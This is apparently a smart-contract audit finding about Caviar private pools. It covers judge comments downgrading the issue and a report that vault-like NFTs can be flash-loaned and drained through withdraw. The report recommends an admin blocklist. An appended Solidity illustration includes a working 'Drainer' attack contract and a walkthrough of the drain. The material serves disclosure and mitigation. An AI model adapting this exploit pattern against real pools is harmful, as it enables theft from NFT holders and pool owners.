Closed code423n4 closed 1 year ago
outdoteth marked the issue as sponsor acknowledged
Technically true, but adding a blocklist adds a centralized dependency. The negatives of centralization outweigh the marginal benefit of fixing this imo.
Given:
Am considering a QA Low Severity
Hi @GalloDaSballo, really appreciate you for judging the issues over the weekend! I understand your points on this and my other report (#26) and would respect your judgements. Thanks again for your work and time!
GalloDaSballo changed the severity to QA (Quality Assurance)
Downgrading to QA considering the previous disclosure.
I highly recommend @outdoteth to warn via the UI around the risks of composability, but I believe that from C4's side, the finding was already shown in the previous contest
GalloDaSballo marked the issue as grade-c
Closing as OOS / Known
Lines of code
https://github.com/outdoteth/caviar-private-pools/blob/main/src/PrivatePool.sol#L163-L209
Vulnerability details
Impact
This mitigation for M-12: Prohibition to create private pools with the factory NFT adds the following `PrivatePoolNftNotSupported` error in the `PrivatePool` contract and updates the `PrivatePool.initialize` function to execute `if (_nft == factory) revert PrivatePoolNftNotSupported()`. This prevents the creation of private pools that use `factory` as `nft`, so no one can deposit or sell the Private Pool Factory NFT to another created private pool. Since malicious actors can no longer utilize functions like `PrivatePool.flashLoan` and `PrivatePool.withdraw` to transfer out the base tokens and NFTs owned by a Private Pool Factory NFT, the issue regarding the Private Pool Factory NFT in M-12: Prohibition to create private pools with the factory NFT is mitigated.
https://github.com/outdoteth/caviar-private-pools/pull/14/files#diff-6beea546a01e795e1365ca8a74b2bd952631f6cd228a5a869bfed82bf1f46a0fR82
https://github.com/outdoteth/caviar-private-pools/pull/14/files#diff-6beea546a01e795e1365ca8a74b2bd952631f6cd228a5a869bfed82bf1f46a0fR160-R206
Yet, this issue still applies to other factory or vault-like NFTs, which are similar to the Private Pool Factory NFT and can control other assets. If a private pool is created with `nft` corresponding to such a factory or vault-like NFT, users can still deposit or sell such NFT to that private pool. Then, a malicious actor can call the `PrivatePool.flashLoan` function to borrow such NFT and call the `PrivatePool.withdraw` function in the flashloan callback to withdraw all of the other assets controlled by such NFT. Afterwards, such NFT becomes worthless without controlling the other assets. If anyone still buys or borrows such NFT, it is a loss to that buyer or borrower; otherwise, it is a loss to the private pool owner if she or he is not the malicious actor.
Proof of Concept
The following steps can occur for the described scenario.
3. The malicious actor calls the `PrivatePool.flashLoan` function to borrow such NFT and calls the `PrivatePool.withdraw` function in the flashloan callback to withdraw all of the other assets controlled by such NFT. Then, such NFT, which no longer controls any of the other assets, is returned to Alice's private pool.
4. The user who sold such NFT to Alice's private pool in step 2 calls the `PrivatePool.buy` function to buy back such NFT that he sold in step 2. However, because such NFT has become worthless, he essentially loses the other assets that were controlled by such NFT.
Tools Used
VSCode
Recommended Mitigation Steps
A blocklist, which should only be updatable by the trusted admin, can be added to include the factory or vault-like NFTs that are similar to but not the Private Pool Factory NFT. Then, in addition to executing `if (_nft == factory) revert PrivatePoolNftNotSupported()`, the `PrivatePool.initialize` function can be updated to also revert if `_nft` is found in this blocklist. Moreover, this protocol should clearly communicate with its users regarding this risk so they can be extra cautious when deciding on whether they should interact with a private pool that uses such a factory or vault-like NFT that is to be added to this blocklist.
Assessed type
Other
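The flash-loan-then-withdraw flow from the Proof of Concept and the blocklist check from the Recommended Mitigation Steps, as an added illustration that is not part of the original report and not caviar-private-pools code. Everything in it is a simplified assumption: `VaultNft` stands in for any vault-like NFT whose current owner can pull the assets it controls, `ToyPool` reduces a private pool to `initialize` plus `flashLoan`, `NftBlocklist` is the admin-maintained list the report recommends, and `Drainer` is the attacker's flash-loan receiver. The real `PrivatePool` interfaces (ERC-3156 receiver, `flashLoan` and `initialize` signatures, the `withdraw` path on the controlled pool) are not reproduced.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Added illustration, not the project's code. Every contract, function and name
// below (VaultNft, NftBlocklist, ToyPool, Drainer, onFlashLoan) is a simplified
// assumption that mirrors the flow described in the report.

interface IFlashBorrower {
    function onFlashLoan(address initiator, address token, uint256 id, bytes calldata data) external;
}

/// A "vault-like" NFT: whoever owns token `id` at call time may pull the ETH it controls.
contract VaultNft {
    mapping(uint256 => address) public ownerOf;
    mapping(uint256 => uint256) public controlled;

    function mint(uint256 id) external payable {
        require(ownerOf[id] == address(0), "minted");
        ownerOf[id] = msg.sender;
        controlled[id] = msg.value;
    }

    // Simplified: only the current owner may move the token (no approvals).
    function transferFrom(address from, address to, uint256 id) external {
        require(ownerOf[id] == from && msg.sender == from, "not owner");
        ownerOf[id] = to;
    }

    // The assets behind the token go to whoever holds it right now.
    function withdraw(uint256 id) external {
        require(ownerOf[id] == msg.sender, "not owner");
        uint256 amount = controlled[id];
        controlled[id] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "send failed");
    }
}

/// Admin-maintained list of vault/factory-like NFTs that must never back a pool
/// (the report's recommendation, layered on top of the existing `_nft == factory` check).
contract NftBlocklist {
    address public immutable admin;
    mapping(address => bool) public blocked;

    constructor() { admin = msg.sender; }

    function setBlocked(address nft, bool isBlocked) external {
        require(msg.sender == admin, "not admin");
        blocked[nft] = isBlocked;
    }
}

/// Minimal pool: backed by one NFT collection, flash-lends the tokens it holds.
contract ToyPool {
    error PrivatePoolNftNotSupported();

    address public immutable factory;
    NftBlocklist public immutable blocklist;
    address public nft;

    constructor(address _factory, NftBlocklist _blocklist) {
        factory = _factory;
        blocklist = _blocklist;
    }

    function initialize(address _nft) external {
        require(nft == address(0), "initialized");
        // Existing mitigation plus the recommended blocklist: reject the factory NFT
        // and any admin-listed vault-like NFT as the pool's collection.
        if (_nft == factory || blocklist.blocked(_nft)) revert PrivatePoolNftNotSupported();
        nft = _nft;
    }

    // The receiver is the registered owner of `id` for the whole callback, which is
    // exactly the window in which a vault-like NFT turns into a drain.
    function flashLoan(address receiver, uint256 id, bytes calldata data) external {
        VaultNft token = VaultNft(nft);
        require(token.ownerOf(id) == address(this), "not in pool");
        token.transferFrom(address(this), receiver, id);
        IFlashBorrower(receiver).onFlashLoan(msg.sender, nft, id, data);
        // The pool only checks that the token came back, not that it still controls anything.
        require(token.ownerOf(id) == address(this), "not returned");
    }
}

/// The attacker's receiver: empty the vault while holding the token, then hand it back.
contract Drainer is IFlashBorrower {
    ToyPool public immutable pool;
    uint256 public drained;

    constructor(ToyPool _pool) { pool = _pool; }

    function attack(uint256 id) external {
        pool.flashLoan(address(this), id, "");
    }

    function onFlashLoan(address, address token, uint256 id, bytes calldata) external override {
        require(msg.sender == address(pool), "not pool");
        VaultNft(token).withdraw(id);                                   // pull everything the token controls
        VaultNft(token).transferFrom(address(this), address(pool), id); // return a now-empty shell
    }

    receive() external payable { drained += msg.value; }
}
```

To walk the scenario: deploy `NftBlocklist` and `ToyPool(someFactory, blocklist)`, call `initialize(address(vault))`, have a user `mint(1)` on `VaultNft` with some ETH and `transferFrom` token 1 to the pool, then call `Drainer.attack(1)`. Afterwards the pool still owns token 1, `vault.controlled(1)` is 0 and `drained` equals the ETH that token controlled, so a later `buy` of token 1 pays for an empty shell. If the admin first calls `blocklist.setBlocked(address(vault), true)`, `initialize` reverts with `PrivatePoolNftNotSupported` and the pool can never be created around that collection in the first place.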